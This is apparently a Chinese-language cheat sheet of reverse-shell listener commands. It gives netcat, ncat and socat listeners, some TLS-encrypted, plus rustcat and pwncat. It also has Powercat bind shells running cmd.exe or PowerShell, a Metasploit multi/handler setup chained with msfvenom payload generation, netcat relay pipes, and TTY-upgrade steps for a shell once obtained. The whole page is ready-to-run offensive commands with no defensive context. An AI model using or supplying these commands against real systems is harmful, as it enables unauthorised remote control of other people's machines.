Listener Cheatsheet
精选 30+ 条监听器命令,涵盖 Netcat、Socat、Pwncat、Metasploit 等多种工具与高级技巧。
基础监听器
Netcat 监听 (最常用)
nc -lvnp {PORT} Ncat 监听 (增强版)
ncat -lvnp {PORT} rlwrap + nc (命令历史)
rlwrap -cAr nc -lvnp {PORT} 加密监听器
Ncat TLS/SSL 加密监听
ncat --ssl -lvnp {PORT} OpenSSL TLS 监听
openssl s_server -quiet -key {KEY}.pem -cert {CERT}.pem -port {PORT} Socat TLS 监听
socat openssl-listen:{PORT},cert={CERT}.pem,key={KEY}.pem,verify=0 fork 高级监听器
Rustcat 监听
rcat -lp {PORT} Rustcat + 命令历史记录
rcat -lHp {PORT} Pwncat (自动 TTY 升级)
python3 -m pwncat -lp {PORT} Socat 基础监听
socat -d -d TCP-LISTEN:{PORT} STDOUT Socat TTY 监听 (完整终端)
socat -d -d file:`tty`,raw,echo=0 TCP-LISTEN:{PORT} PowerShell 监听器
Powercat 监听
powercat -l -p {PORT} Powercat + cmd.exe
powercat -l -p {PORT} -e cmd.exe Powercat + PowerShell
powercat -l -p {PORT} -e powershell.exe Metasploit 监听器
MSFconsole 快速启动
msfconsole -q -x "use multi/handler; set payload {PAYLOAD}; set lhost {IP}; set lport {PORT}; exploit" MSFconsole 交互式设置
msfconsole
use multi/handler
set PAYLOAD {PAYLOAD}
set LHOST {IP}
set LPORT {PORT}
exploit 生成 Payload + 启动监听
msfvenom -p {PAYLOAD} LHOST={IP} LPORT={PORT} -f raw > payload.bin && msfconsole -q -x "use multi/handler; set payload {PAYLOAD}; set lhost {IP}; set lport {PORT}; exploit" Windows 监听器
ConPty (Windows 伪终端)
stty raw -echo; (stty size; cat) | nc -lvnp {PORT} Windows Netcat 64位
nc64.exe -lvnp {PORT} Windows Ncat
ncat.exe -lvnp {PORT} 特殊场景监听器
端口转发监听
nc -lvp {PORT1} 0<backpipe | nc -lvp {PORT2} 1>backpipe 双向流量中继
mkfifo backpipe; nc -lvnp {PORT} 0<backpipe | tee /tmp/out | nc {TARGET} {TARGET_PORT} > backpipe Socat 端口转发
socat TCP-LISTEN:{PORT1},fork TCP:{TARGET}:{PORT2} 带日志的监听器
nc -lvnp {PORT} --sh-exec "cat - >&2; echo "[\$(date)] Connection received" >&2" 监听器技巧与优化
设置 TTY 大小 (获取 Shell 后)
stty -icanon -echo row 40 col 160 设置终端类型 (支持颜色)
export TERM=xterm-256color Python TTY 升级 (获取 Shell 后)
python3 -c "import pty; pty.spawn('/bin/bash')" Script TTY 升级 (获取 Shell 后)
script /dev/null 完整 TTY 升级流程
Ctrl+Z -> stty raw -echo -> fg -> Enter 未找到相关命令
试试搜索其他关键字,如 "nc" 或 "msf"。